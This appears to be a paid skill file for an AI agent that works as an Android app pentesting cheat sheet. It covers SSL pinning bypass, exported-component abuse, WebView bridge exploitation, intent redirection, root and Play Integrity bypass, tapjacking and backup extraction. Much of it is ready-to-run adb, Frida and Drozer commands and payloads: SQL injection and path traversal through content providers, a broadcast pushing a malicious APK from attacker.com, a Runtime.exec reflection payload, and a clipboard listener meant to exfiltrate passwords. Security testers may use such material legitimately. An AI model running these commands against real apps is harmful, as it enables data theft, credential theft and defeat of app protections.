SKILL.md
$27
1. SSL PINNING BYPASS
1.1 Frida Universal Bypass
# Install Frida server on device
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"
# Universal SSL pinning bypass
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pauseHook Point
Library/Class
Coverage
X509TrustManager.checkServerTrusted
Android SDK
All standard HTTPS
OkHttpClient.Builder.sslSocketFactory
OkHttp 3.x/4.x
Square OkHttp
CertificatePinner.check
OkHttp 3.x/4.x
OkHttp pinning
HttpsURLConnection.setSSLSocketFactory
Android SDK
Legacy HTTPS
SSLContext.init
Android SDK
Custom SSL contexts
WebViewClient.onReceivedSslError
WebView
WebView SSL errors
TrustManagerFactory.getTrustManagers
Android SDK
Factory-created TMs
1.2 Objection (Quick Method)
objection -g com.target.app explore
# Inside Objection REPL:
android sslpinning disable1.3 Network Security Config (Debug Builds)
If you can modify the APK or it's a debug build:
<!-- res/xml/network_security_config.xml -->
<network-security-config>
<debug-overrides>
<trust-anchors>
<certificates src="user" /> <!-- Trust user-installed CAs -->
</trust-anchors>
</debug-overrides>
</network-security-config>1.4 Magisk Module Approach
Module
Method
Scope
LSPosed + TrustMeAlready
Hooks system-wide TrustManager
All apps
LSPosed + SSLUnpinning
Targeted SSL bypass
Per-app
MagiskTrustUserCerts
Moves user CA to system store
All apps trusting system CAs
ConscryptTrustUserCerts
Patches Conscrypt
Newer Android (7+)
2. COMPONENT EXPOSURE
2.1 Exported Activities
# Find exported activities (AndroidManifest.xml or aapt)
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"
# Launch exported activity directly
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
-d "target://callback?token=attacker_token"
# With extra data
adb shell am start -n com.target.app/.TransferActivity \
--es "amount" "99999" --es "recipient" "attacker"2.2 Content Providers
# Query exposed content providers
adb shell content query --uri content://com.target.app.provider/users
# SQL injection in content provider
adb shell content query --uri "content://com.target.app.provider/users" \
--where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"
# Path traversal in file-providing content provider
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"Provider Type
Attack Vector
Impact
Database-backed
SQL injection via query() projection/selection
Data leak, auth bypass
File-backed
Path traversal via URI
Read arbitrary files
Parcelable
Type confusion in custom Parcelable
Code execution
2.3 Broadcast Receivers
# Send crafted broadcast
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
--es "url" "http://attacker.com/malicious.apk"
# Ordered broadcast interception (higher priority receiver intercepts first)
# Register receiver with higher priority than target to intercept/modify data2.4 Exported Services
# Start/bind to exported service
adb shell am startservice -n com.target.app/.BackgroundService \
--es "command" "exfiltrate"
# List running services
adb shell dumpsys activity services | grep com.target3. WEBVIEW VULNERABILITIES
3.1 JavaScript Interface RCE (Pre-API 17)
// Vulnerable code: addJavascriptInterface without @JavascriptInterface annotation
webView.addJavascriptInterface(new JSInterface(), "android");
// Pre-API 17: Reflection-based RCE via injected JavaScript
// Inject into WebView:
// android.getClass().forName('java.lang.Runtime')
// .getMethod('getRuntime').invoke(null).exec('id')3.2 Modern WebView Attacks
Vulnerability
Condition
Exploit
setJavaScriptEnabled(true) + untrusted content
JS enabled + attacker controls loaded URL
XSS → bridge access
setAllowFileAccessFromFileURLs(true)
file:// can read other file://
Load file:///data/data/com.target/...
setAllowUniversalAccessFromFileURLs(true)
file:// can access any origin
Exfiltrate via XHR to attacker
loadUrl(user_controlled)
User input in loadUrl
javascript: scheme or file://
shouldOverrideUrlLoading bypass
Incomplete URL validation
Redirect to attacker-controlled page
evaluateJavascript with tainted data
User data in JS execution
XSS in WebView context
3.3 Deep Link to WebView Chain
1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions4. INTENT REDIRECTION
Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.
// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity# Exploit: start non-exported internal activity via redirection
adb shell am start -n com.target.app/.ExportedActivity \
--es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"Pattern
Indicator
Risk
getParcelableExtra → startActivity
Intent-in-Intent
Start non-exported activities
getStringExtra("url") → startActivity(Intent.ACTION_VIEW)
URL forwarding
Open arbitrary URLs
getStringExtra("class") → Class.forName → startActivity
Dynamic class loading
Start any activity by name
5. ROOT DETECTION BYPASS
5.1 Common Root Detection Checks
Check
What It Detects
Frida Bypass
su binary exists
/system/xbin/su, /sbin/su
Hook File.exists() → return false
Build tags contain "test-keys"
Build.TAGS
Hook Build.TAGS → return "release-keys"
Magisk Manager installed
Package name check
Hook PackageManager.getPackageInfo
Superuser.apk present
Su management app
Hook File.exists()
RootBeer library
Multi-check root detection
Hook all RootBeer check methods
SafetyNet/Play Integrity
Server-side attestation
Requires Magisk DenyList + module
Abnormal system properties
ro.debuggable=1, etc.
Hook SystemProperties.get
5.2 Magisk DenyList (Previously MagiskHide)
# Enable DenyList in Magisk Manager
# Add target app to DenyList — Magisk hides itself from that app
# Covers: su binary, Magisk Manager package, mount points, props6. PLAY INTEGRITY / SAFETYNET BYPASS
Level
What It Checks
Bypass Difficulty
Basic Integrity
Not rooted, not emulator
Easy (Magisk + DenyList)
Device Integrity
Bootloader locked, verified boot
Hard (requires locked bootloader)
Strong Integrity
Hardware-backed attestation
Very hard (hardware TEE)
Techniques:
- Magisk with Zygisk enabled + DenyList for target app
- Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
- Shamiko module: hides root from specific apps
- Custom ROM with locked bootloader (Pixel-specific tricks)
7. TAPJACKING (OVERLAY ATTACKS)
<!-- Malicious overlay activity -->
<activity android:name=".OverlayActivity"
android:theme="@style/TransparentTheme"
android:excludeFromRecents="true">
</activity>
<!-- Requires SYSTEM_ALERT_WINDOW permission (draw over other apps) -->Android Version
Protection
Bypass
Pre-6.0
None
Full overlay
6.0–11
filterTouchesWhenObscured (opt-in)
Apps not using it are vulnerable
12+
Untrusted touches blocked for overlay windows
Partial overlays, timing-based
8. BACKUP EXTRACTION
# Check if backup allowed
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)
# Extract backup
adb backup -f backup.ab -apk com.target.app
# Convert to tar
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar
# Analyze extracted data
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check shared_prefs/ for tokens, credentials
# Check databases/ for SQLite DBs with sensitive data9. ADDITIONAL TRICKS
9.1 Debuggable App Exploitation
# If android:debuggable="true" in manifest
adb shell run-as com.target.app
# Now running as the app's user — full data directory access
cat /data/data/com.target.app/shared_prefs/*.xml9.2 Drozer (Component Testing Framework)
# List attack surface
dz> run app.package.attacksurface com.target.app
# Exported Activities: 3
# Exported Services: 1
# Exported Providers: 2
# Query provider
dz> run app.provider.query content://com.target.app.provider/users
# Scan for injection
dz> run scanner.provider.injection -a com.target.app9.3 Clipboard Sniffing
// Pre-Android 10: any app can read clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
ClipData data = cm.getPrimaryClip();
// Exfiltrate copied passwords, tokens, etc.
});10. ANDROID PENTESTING DECISION TREE
Testing Android application
│
├── Can intercept HTTPS traffic?
│ ├── No → SSL pinning in place
│ │ ├── Frida available? → universal SSL bypass script (§1.1)
│ │ ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│ │ ├── Debug build? → Network Security Config (§1.3)
│ │ └── None above? → manual decompile + patch + repackage
│ └── Yes → proceed to traffic analysis
│
├── Exported components found?
│ ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│ ├── Content Providers → SQLi, path traversal (§2.2)
│ ├── Broadcast Receivers → crafted intent injection (§2.3)
│ └── Services → unauthorized service binding (§2.4)
│
├── WebView present?
│ ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│ ├── File access enabled? → file:// scheme abuse (§3.2)
│ └── Deep link → WebView? → URL injection chain (§3.3)
│
├── Intent handling found?
│ └── Intent-in-Intent pattern? → redirect to internal activity (§4)
│
├── Root detection blocking testing?
│ ├── Client-side checks only? → Frida hook bypass (§5.1)
│ ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│ └── Custom obfuscated checks? → reverse engineer + targeted hooks
│
├── Sensitive data storage?
│ ├── allowBackup=true? → ADB backup extraction (§8)
│ ├── Debuggable? → run-as for direct data access (§9.1)
│ └── SharedPreferences → check for plaintext tokens/credentials
│
└── UI-based attacks applicable?
└── Overlay possible? → tapjacking (§7)